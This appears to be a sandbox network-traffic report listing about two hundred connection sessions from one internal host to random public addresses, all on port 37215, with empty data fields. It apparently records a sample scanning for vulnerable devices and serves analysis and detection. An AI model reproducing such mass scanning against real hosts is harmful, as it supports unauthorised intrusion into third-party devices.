                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12728192.168.2.1558608197.186.88.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12729192.168.2.1555372197.249.144.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12730192.168.2.1554990197.84.149.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12731192.168.2.1542130197.20.95.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12732192.168.2.1543698197.68.128.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12733192.168.2.1549964197.217.24.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12734192.168.2.1549630197.224.90.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12735192.168.2.1541554197.241.104.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12736192.168.2.1543690197.73.249.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12737192.168.2.1540036197.124.112.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12738192.168.2.1532940197.240.77.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12739192.168.2.1559928197.30.198.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12740192.168.2.1552932197.63.101.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12741192.168.2.1545094197.80.191.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12742192.168.2.1548328197.108.125.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12743192.168.2.1547594197.152.206.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12744192.168.2.1543860197.173.3.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12745192.168.2.1549504197.40.46.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12746192.168.2.1551764197.163.170.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12747192.168.2.1550268197.28.43.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12748192.168.2.1542638197.117.233.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12749192.168.2.1558586197.49.150.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12750192.168.2.1547608197.20.209.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12751192.168.2.1556238197.195.48.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12752192.168.2.1545160197.148.226.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12753192.168.2.1548128197.217.161.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12754192.168.2.1559696197.172.165.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12755192.168.2.1547304197.88.133.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12756192.168.2.1557248197.157.180.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12757192.168.2.1550762197.51.11.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12758192.168.2.1552358197.73.189.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12759192.168.2.1534850197.148.121.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12760192.168.2.1538926197.81.230.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12761192.168.2.1553662197.27.21.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12762192.168.2.1545820197.219.36.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12763192.168.2.1549032197.166.81.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12764192.168.2.1537602197.255.113.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12765192.168.2.1552586156.210.201.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12766192.168.2.1557276156.177.214.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12767192.168.2.1541668156.19.200.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12768192.168.2.1533698197.41.2.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12769192.168.2.1537460156.38.37.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12770192.168.2.1550108156.102.102.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12771192.168.2.1542936156.49.219.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12772192.168.2.1554088156.2.213.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12773192.168.2.1544092156.183.219.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12774192.168.2.1556062156.81.114.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12775192.168.2.1541784156.191.249.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12776192.168.2.1547186156.10.154.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12777192.168.2.1559626156.148.105.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12778192.168.2.1547800156.197.101.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12779192.168.2.1559594156.110.241.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12780192.168.2.1552734156.106.70.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12781192.168.2.1532908156.118.123.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12782192.168.2.1545722156.43.60.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12783192.168.2.1558552156.44.18.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12784192.168.2.1555732156.134.78.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12785192.168.2.1533650156.123.89.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12786192.168.2.1537404156.8.244.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12787192.168.2.1543202156.44.210.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12788192.168.2.1554662156.227.64.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12789192.168.2.1544868156.20.225.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12790192.168.2.1534506156.89.190.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12791192.168.2.1542622156.59.177.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12792192.168.2.1544968156.51.183.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12793192.168.2.1537082156.74.122.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12794192.168.2.1560144156.75.194.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12795192.168.2.1560934156.114.79.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12796192.168.2.1538448156.113.192.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12797192.168.2.1536588156.123.252.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12798192.168.2.1536278156.90.48.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12799192.168.2.1556998156.146.1.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12800192.168.2.1551878156.50.206.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12801192.168.2.1557110156.38.186.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12802192.168.2.1542732156.7.176.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12803192.168.2.1542306156.167.149.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12804192.168.2.1540146156.138.213.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12805192.168.2.1547240156.145.139.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12806192.168.2.1549500156.120.144.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12807192.168.2.1543944156.34.105.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12808192.168.2.1559074156.201.133.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12809192.168.2.1543428156.89.245.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12810192.168.2.1544774156.67.230.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12811192.168.2.1555744156.168.166.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12812192.168.2.1553492156.201.57.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12813192.168.2.1547806156.184.179.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12814192.168.2.1536012156.28.149.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12815192.168.2.1547136156.243.121.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12816192.168.2.1540740156.62.147.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12817192.168.2.1546432156.46.127.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12818192.168.2.1538584156.86.131.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12819192.168.2.1543134156.198.199.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12820192.168.2.1541954156.38.25.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12821192.168.2.1555176156.249.150.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12822192.168.2.1541370156.134.236.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12823192.168.2.1548734156.204.122.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12824192.168.2.1541282156.171.91.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12825192.168.2.1537842156.236.167.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12826192.168.2.1554944156.119.104.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12827192.168.2.1540402156.185.133.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12828192.168.2.1553732156.144.121.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12829192.168.2.1548964156.198.37.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12830192.168.2.1549476156.140.64.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12831192.168.2.1546204156.212.68.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12832192.168.2.1545602156.220.1.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12833192.168.2.1543416156.60.227.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12834192.168.2.1538946156.217.145.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12835192.168.2.1538734156.194.62.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12836192.168.2.1555476156.181.28.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12837192.168.2.1541180156.18.27.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12838192.168.2.1555388156.1.97.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12839192.168.2.1552472156.129.81.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12840192.168.2.1554496156.252.224.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12841192.168.2.1540374156.107.78.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12842192.168.2.1553198156.56.58.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12843192.168.2.1560592156.88.216.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12844192.168.2.1550860156.160.140.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12845192.168.2.1546366156.94.65.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12846192.168.2.1554416156.11.166.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12847192.168.2.1541626156.188.111.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12848192.168.2.1535368156.34.175.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12849192.168.2.1557066156.177.96.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12850192.168.2.1537214156.74.48.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12851192.168.2.1560444156.151.79.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12852192.168.2.1559234156.17.193.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12853192.168.2.1550776156.160.96.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12854192.168.2.1559346156.109.34.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12855192.168.2.1544372156.139.105.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12856192.168.2.1560950156.125.27.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12857192.168.2.1559384156.189.108.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12858192.168.2.1550802156.93.76.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12859192.168.2.1558906156.218.249.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12860192.168.2.1544802156.140.67.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12861192.168.2.1538726156.183.147.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12862192.168.2.1544794156.160.107.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12863192.168.2.1551900156.94.203.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12864192.168.2.1534364156.201.170.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12865192.168.2.1560908156.187.24.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12866192.168.2.1534302156.150.56.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12867192.168.2.1553146156.224.24.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12868192.168.2.1554042156.184.60.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12869192.168.2.1534796156.228.133.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12870192.168.2.1544680156.51.209.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12871192.168.2.1555810156.218.89.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12872192.168.2.1541730156.17.240.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12873192.168.2.1537664156.180.108.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12874192.168.2.1541386156.8.158.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12875192.168.2.1540680156.101.245.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12876192.168.2.1544290156.47.45.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12877192.168.2.1537140156.236.37.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12878192.168.2.1540954156.200.18.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12879192.168.2.1551330156.20.26.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12880192.168.2.1537076156.151.253.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12881192.168.2.1537880156.134.168.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12882192.168.2.1559272156.165.244.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12883192.168.2.1548366156.5.138.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12884192.168.2.1542186156.84.240.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12885192.168.2.1532854156.253.250.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12886192.168.2.1546644156.106.117.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12887192.168.2.1535314156.89.2.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12888192.168.2.1547942156.227.46.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12889192.168.2.1541272156.243.79.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12890192.168.2.1559200156.212.108.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12891192.168.2.1545810156.141.196.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12892192.168.2.1546696156.55.254.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12893192.168.2.1534632156.72.92.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12894192.168.2.1544314156.206.15.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12895192.168.2.1552090156.195.24.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12896192.168.2.1534538156.56.55.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12897192.168.2.1545930156.142.216.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12898192.168.2.1547698156.120.128.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12899192.168.2.1534236156.71.91.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12900192.168.2.1541506156.118.117.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12901192.168.2.1554720156.12.250.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12902192.168.2.1544864156.246.215.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12903192.168.2.1544926156.95.228.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12904192.168.2.1537646156.249.184.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12905192.168.2.1540854156.209.88.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12906192.168.2.1535774156.214.29.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12907192.168.2.1543254156.49.174.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12908192.168.2.1544182156.135.197.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12909192.168.2.1560414156.33.8.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12910192.168.2.1538174156.133.118.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12911192.168.2.1560530156.245.99.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12912192.168.2.1556688156.137.159.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12913192.168.2.1550320156.55.251.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12914192.168.2.1547294156.203.35.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12915192.168.2.1551912156.173.200.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12916192.168.2.1541484156.70.141.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12917192.168.2.1555638156.181.25.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12918192.168.2.1544246156.247.153.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12919192.168.2.1541504156.230.251.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12920192.168.2.1551320156.199.248.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12921192.168.2.1548614156.110.177.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12922192.168.2.1560108156.19.197.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12923192.168.2.1544636156.141.241.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12924192.168.2.1554666156.140.55.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12925192.168.2.1534404156.5.244.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12926192.168.2.1556410156.137.99.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12927192.168.2.1544304156.127.195.2337215
                                                                            TimestampBytes transferredDirectionData


